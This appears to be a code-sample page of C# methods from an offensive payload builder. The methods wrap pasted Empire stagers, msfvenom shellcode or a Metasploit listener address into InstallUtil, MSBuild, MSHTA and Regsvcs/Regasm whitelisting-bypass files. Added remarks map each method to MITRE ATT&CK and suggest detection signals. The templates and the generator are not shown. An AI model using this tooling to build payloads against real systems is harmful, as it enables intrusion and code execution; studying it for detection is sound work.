Beispiel #1
        /// <summary>
        /// Reads a pasted base64 string, transcodes it, and passes it together with
        /// <c>Resources.Template_InstallUtil_PowerShell</c> to <c>Generators.GeneratePayload</c>
        /// in "Compile" mode with the options "/unsafe /platform:x86".
        /// </summary>
        /// <remarks>
        /// Defender note: the template and helper names indicate that the compiled output is meant
        /// to be launched through InstallUtil, a signed system binary (MITRE ATT&amp;CK T1218.004).
        /// InstallUtil executions against assemblies in user-writable paths are worth alerting on.
        /// The helpers and the generator are defined elsewhere and are not visible here.
        /// </remarks>
        private static void Empire()
        {
            // Name offered to Helpers.FileFolderLocation as the default output file.
            const string defaultOutputName = "InstallUtilPowerShellB64.exe";

            Helpers.WriteEmpireExample();
            string pastedBase64 = Helpers.PasteToString();

            // Transcode: base64 -> UTF-16LE text -> replace '&' with '.' -> UTF-8 bytes -> base64.
            // FromBase64String throws FormatException on malformed input; it is not caught here.
            byte[] utf16Bytes = Convert.FromBase64String(pastedBase64);
            string scriptText = Encoding.Unicode.GetString(utf16Bytes);

            // The original author attributes this replacement to an unspecified bug.
            // Note that it rewrites every '&' in the decoded text, not only the first one.
            string patchedText = scriptText.Replace("&", ".");
            string reencoded   = Convert.ToBase64String(Encoding.UTF8.GetBytes(patchedText));

            string outputPath = Helpers.FileFolderLocation(defaultOutputName);

            Generators.GeneratePayload(
                Resources.Template_InstallUtil_PowerShell,
                outputPath,
                reencoded,
                "Compile",
                "/unsafe /platform:x86",
                null,
                null);

            Console.WriteLine();
            Console.WriteLine("Commands used to execute payload:");
            Helpers.WriteInstallUtilPayloadExample(outputPath);
            Helpers.PauseExecution();
        }
Beispiel #2
        /// <summary>
        /// Prompts for a base64 string, transcodes it, echoes the result to the console, and
        /// passes it with <c>Resources.Template_MSBuild_PowerShell</c> to
        /// <c>Generators.GeneratePayload</c> in "GenerateFile" mode.
        /// </summary>
        /// <remarks>
        /// Defender note: the template and helper names indicate an MSBuild project file that is
        /// meant to be built by the signed MSBuild binary (MITRE ATT&amp;CK T1127.001). MSBuild
        /// runs on hosts that are not build machines, or against files with unusual extensions
        /// such as ".bypass", are a useful detection signal.
        /// </remarks>
        private static void Empire()
        {
            // Name offered to Helpers.FileFolderLocation as the default output file.
            const string defaultOutputName = "MSBuildEmpireStager.bypass";

            Helpers.WriteEmpireExample();

            // Highlighted operator instruction, followed by the paste prompt.
            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine("Important! -->Only paste the base64 encoded string<--");
            Console.ResetColor();
            Console.WriteLine("Press Enter in an empty line to exit paste");

            string pastedBase64 = Helpers.PasteToString();

            // base64 -> UTF-16LE text; FormatException on malformed input is not caught here.
            byte[] utf16Bytes = Convert.FromBase64String(pastedBase64);
            string scriptText = Encoding.Unicode.GetString(utf16Bytes);

            // The original author attributes this replacement to an unspecified bug.
            // It rewrites every '&' in the decoded text.
            string patchedText = scriptText.Replace("&", ".");

            Console.WriteLine();

            // UTF-8 bytes -> base64; this is the value handed to the generator.
            byte[] utf8Bytes = Encoding.UTF8.GetBytes(patchedText);
            string reencoded = Convert.ToBase64String(utf8Bytes);

            // The re-encoded string is printed to the console before it is used.
            Console.WriteLine(reencoded);
            Console.WriteLine();

            string outputPath = Helpers.FileFolderLocation(defaultOutputName);

            Generators.GeneratePayload(
                Resources.Template_MSBuild_PowerShell,
                outputPath,
                reencoded,
                "GenerateFile",
                null,
                null,
                null);

            Helpers.WriteMSBuildPayloadExample(outputPath);
            Helpers.PauseExecution();
        }
Beispiel #3
        /// <summary>
        /// Asks <c>Helpers.FileFolderLocation</c> for an output path (default name
        /// "MSBuildShell.bypass") and calls <c>Generators.GeneratePayload</c> with
        /// <c>Resources.Template_MSBuild_MSBuildShell</c> in "GenerateFile" mode.
        /// </summary>
        /// <remarks>
        /// No operator-supplied payload is passed; the third argument is <c>null</c>.
        /// Defender note: the names point at an MSBuild project file (MITRE ATT&amp;CK T1127.001).
        /// </remarks>
        private static void MSBuildShell()
        {
            string outputPath = Helpers.FileFolderLocation("MSBuildShell.bypass");

            Generators.GeneratePayload(
                Resources.Template_MSBuild_MSBuildShell,
                outputPath,
                null,
                "GenerateFile",
                null,
                null,
                null);

            Helpers.WriteMSBuildPayloadExample(outputPath);
            Helpers.PauseExecution();
        }
Beispiel #4
        /// <summary>
        /// Reads pasted text and passes it unchanged, with
        /// <c>Resources.Template_MSHTA_StarFighter</c>, to <c>Generators.GeneratePayload</c>
        /// in "GenerateFile" mode.
        /// </summary>
        /// <remarks>
        /// Unlike the other Empire variants on this page, the pasted text is not decoded or
        /// re-encoded here. Defender note: the names point at a file meant for mshta.exe
        /// (MITRE ATT&amp;CK T1218.005).
        /// </remarks>
        private static void EmpireStarFighter()
        {
            // Name offered to Helpers.FileFolderLocation as the default output file.
            const string defaultOutputName = "MSHTA_StarFighter.bypass";

            Helpers.WriteEmpireExample();

            string pastedStager = Helpers.PasteToString();
            string outputPath   = Helpers.FileFolderLocation(defaultOutputName);

            Generators.GeneratePayload(
                Resources.Template_MSHTA_StarFighter,
                outputPath,
                pastedStager,
                "GenerateFile",
                null,
                null,
                null);

            Helpers.WriteMSHTAPayloadExample(outputPath);
            Helpers.PauseExecution();
        }
Beispiel #5
        /// <summary>
        /// Prompts for a host and a port on the console and passes both, with
        /// <c>Resources.Template_MSHTA_VBSMeter</c>, to <c>Generators.GeneratePayload</c>
        /// in "GenerateFile" mode.
        /// </summary>
        /// <remarks>
        /// The host and port are forwarded exactly as typed. This method does no format or
        /// range validation, and <c>Console.ReadLine</c> may return <c>null</c> at end of input.
        /// Defender note: the names point at a file meant for mshta.exe (MITRE ATT&amp;CK
        /// T1218.005). Outbound connections initiated by mshta.exe are a useful detection signal.
        /// </remarks>
        private static void MetasploitVBSMeter()
        {
            // Name offered to Helpers.FileFolderLocation as the default output file.
            const string defaultOutputName = "MSHTA_VBSMeter.bypass";

            Helpers.WriteVBSMeterExample();

            Console.WriteLine("Enter RHOST (IP to Metasploit server where listener is running):");
            string listenerHost = Console.ReadLine();

            Console.WriteLine("Enter RPORT (Port to Metasploit server where listener is running):");
            string listenerPort = Console.ReadLine();

            string outputPath = Helpers.FileFolderLocation(defaultOutputName);

            // No pasted payload for this template; only host and port are supplied.
            Generators.GeneratePayload(
                Resources.Template_MSHTA_VBSMeter,
                outputPath,
                null,
                "GenerateFile",
                null,
                listenerHost,
                listenerPort);

            Helpers.WriteMSHTAPayloadExample(outputPath);
            Helpers.PauseExecution();
        }
Beispiel #6
        /// <summary>
        /// Prompts for pasted text and passes it unchanged, with
        /// <c>Resources.Template_MSBuild_Shellcode</c>, to <c>Generators.GeneratePayload</c>
        /// in "GenerateFile" mode.
        /// </summary>
        /// <remarks>
        /// The pasted text is not parsed or validated in this method.
        /// Defender note: the names point at an MSBuild project file (MITRE ATT&amp;CK T1127.001).
        /// </remarks>
        private static void Metasploit()
        {
            // Name offered to Helpers.FileFolderLocation as the default output file.
            const string defaultOutputName = "MSBuildMetasploitPayload.bypass";

            Helpers.WriteMetasploitExample();

            // Highlighted operator instruction, followed by the paste prompt.
            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine("Important! --Paste entire output from msfvenom, including byte[] buf and so on--");
            Console.ResetColor();
            Console.WriteLine("Press Enter in an empty line to exit...");

            string pastedText = Helpers.PasteToString();
            string outputPath = Helpers.FileFolderLocation(defaultOutputName);

            Generators.GeneratePayload(
                Resources.Template_MSBuild_Shellcode,
                outputPath,
                pastedText,
                "GenerateFile",
                null,
                null,
                null);

            Helpers.WriteMSBuildPayloadExample(outputPath);
            Helpers.PauseExecution();
        }
Beispiel #7
        /// <summary>
        /// Prompts for pasted text and passes it unchanged, with
        /// <c>Resources.Template_RegsvcsRegasm_Shellcode</c>, to <c>Generators.GeneratePayload</c>
        /// in "Compile" mode with the options "/unsafe /platform:x86".
        /// </summary>
        /// <remarks>
        /// Defender note: the names point at a DLL meant to be loaded through Regsvcs or Regasm
        /// (MITRE ATT&amp;CK T1218.009). Those binaries registering assemblies from user-writable
        /// paths are worth alerting on.
        /// </remarks>
        private static void MetaSploit()
        {
            // Name offered to Helpers.FileFolderLocation as the default output file.
            const string defaultOutputName = "RegsvcsRegasmMetasploitPayload.dll";

            // An earlier revision also passed "/keyfile:meta.snk" to the compiler.
            // The author dropped it, noting that it seems to work without the keyfile.
            const string compilerOptions = "/unsafe /platform:x86";

            Helpers.WriteMetasploitExample();

            // Highlighted operator instruction, followed by the paste prompt.
            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine("Important! --Paste entire output from msfvenom, including byte[] buf and so on--");
            Console.ResetColor();
            Console.WriteLine("Press Enter in an empty line to exit...");

            string pastedText = Helpers.PasteToString();
            string outputPath = Helpers.FileFolderLocation(defaultOutputName);

            Generators.GeneratePayload(
                Resources.Template_RegsvcsRegasm_Shellcode,
                outputPath,
                pastedText,
                "Compile",
                compilerOptions,
                null,
                null);

            Helpers.WriteRegsvcsRegasmPayloadExample(outputPath);
            Helpers.PauseExecution();
        }
Beispiel #8
        /// <summary>
        /// Prompts for pasted text and passes it unchanged, with
        /// <c>Resources.Template_InstallUtil_Shellcode</c>, to <c>Generators.GeneratePayload</c>
        /// in "Compile" mode with the options "/unsafe /platform:x86".
        /// </summary>
        /// <remarks>
        /// Defender note: the names point at an executable meant to be launched through
        /// InstallUtil (MITRE ATT&amp;CK T1218.004).
        /// </remarks>
        private static void MetaSploit()
        {
            // Name offered to Helpers.FileFolderLocation as the default output file.
            const string defaultOutputName = "InstallUtilMetasploit.exe";
            const string compilerOptions   = "/unsafe /platform:x86";

            Helpers.WriteMetasploitExample();

            // Paste prompt, with the operator instruction highlighted in red.
            Console.WriteLine("Paste in your Metasploit C# payload here");
            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine("Important! --Paste entire output from msfvenom, including byte[] buf and so on--");
            Console.ResetColor();
            Console.WriteLine("Press Enter in an empty line to exit...");

            string pastedText = Helpers.PasteToString();
            string outputPath = Helpers.FileFolderLocation(defaultOutputName);

            Generators.GeneratePayload(
                Resources.Template_InstallUtil_Shellcode,
                outputPath,
                pastedText,
                "Compile",
                compilerOptions,
                null,
                null);

            Console.WriteLine();
            Console.WriteLine("Commands used to execute payload:");
            Helpers.WriteInstallUtilPayloadExample(outputPath);
            Helpers.PauseExecution();
        }
Beispiel #9
        /// <summary>
        /// Prompts for plain text, base64-encodes its UTF-8 bytes, and passes the result with
        /// <c>Resources.Template_MSBuild_PowerShell</c> to <c>Generators.GeneratePayload</c>
        /// in "GenerateFile" mode.
        /// </summary>
        /// <remarks>
        /// Defender note: the command text ends up base64-encoded in the generated file, so
        /// plain-string matching on that file will not see it. Decode embedded base64 before
        /// inspecting such artifacts. The names point at an MSBuild project file
        /// (MITRE ATT&amp;CK T1127.001).
        /// </remarks>
        private static void UnencodedPoshCommand()
        {
            // Name offered to Helpers.FileFolderLocation as the default output file.
            const string defaultOutputName = "MSBuildUnencodedPowerShell.bypass";

            Console.WriteLine("Type in your unencoded PowerShell command");
            Console.WriteLine("");
            Console.WriteLine("Example: Get-service > c:\\test\\file.csv");
            Console.WriteLine("");
            Console.WriteLine("Press Enter in an empty line to exit paste");

            // Plain text -> UTF-8 bytes -> base64 (the form handed to the generator).
            string commandText    = Helpers.PasteToString();
            byte[] commandBytes   = Encoding.UTF8.GetBytes(commandText);
            string encodedCommand = Convert.ToBase64String(commandBytes);

            string outputPath = Helpers.FileFolderLocation(defaultOutputName);

            Generators.GeneratePayload(
                Resources.Template_MSBuild_PowerShell,
                outputPath,
                encodedCommand,
                "GenerateFile",
                null,
                null,
                null);

            Helpers.WriteMSBuildPayloadExample(outputPath);
            Helpers.PauseExecution();
        }
Beispiel #10
        /// <summary>
        /// Prompts for a base64 string, prints its decoded text, transcodes it, and passes the
        /// result with <c>Resources.Template_RegsvcsRegasm_PowerShell</c> to
        /// <c>Generators.GeneratePayload</c> in "Compile" mode with "/unsafe /platform:x86".
        /// </summary>
        /// <remarks>
        /// Defender note: the names point at a DLL meant to be loaded through Regsvcs or Regasm
        /// (MITRE ATT&amp;CK T1218.009).
        /// </remarks>
        private static void Empire()
        {
            // Name offered to Helpers.FileFolderLocation as the default output file.
            const string defaultOutputName = "RegsvcsRegasmEmpireStager.dll";

            Helpers.WriteEmpireExample();

            // Highlighted operator instruction, followed by the paste prompt.
            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine("Important! -->Only paste the base64 encoded string<--");
            Console.ResetColor();
            Console.WriteLine("Press Enter in an empty line to exit paste");

            string pastedBase64 = Helpers.PasteToString();

            // base64 -> UTF-16LE text; FormatException on malformed input is not caught here.
            byte[] utf16Bytes = Convert.FromBase64String(pastedBase64);
            string scriptText = Encoding.Unicode.GetString(utf16Bytes);

            // The decoded text is echoed to the console before it is modified.
            Console.WriteLine(scriptText);

            // The original author attributes this replacement to an unspecified bug.
            // It rewrites every '&' in the decoded text.
            string patchedText = scriptText.Replace("&", ".");

            Console.WriteLine();

            // UTF-8 bytes -> base64; this is the value handed to the generator.
            byte[] utf8Bytes = Encoding.UTF8.GetBytes(patchedText);
            string reencoded = Convert.ToBase64String(utf8Bytes);

            Console.WriteLine();

            string outputPath = Helpers.FileFolderLocation(defaultOutputName);

            // Earlier revisions passed extra compiler options: a reference to
            // System.Management.Automation.dll from the GAC, or "/keyfile:meta.snk".
            // Author's note: meta.snk is hardcoded in the template, and the file needs to be
            // in the directory where the tool is run.
            Generators.GeneratePayload(
                Resources.Template_RegsvcsRegasm_PowerShell,
                outputPath,
                reencoded,
                "Compile",
                "/unsafe /platform:x86",
                null,
                null);

            Helpers.WriteRegsvcsRegasmPayloadExample(outputPath);
            Helpers.PauseExecution();
        }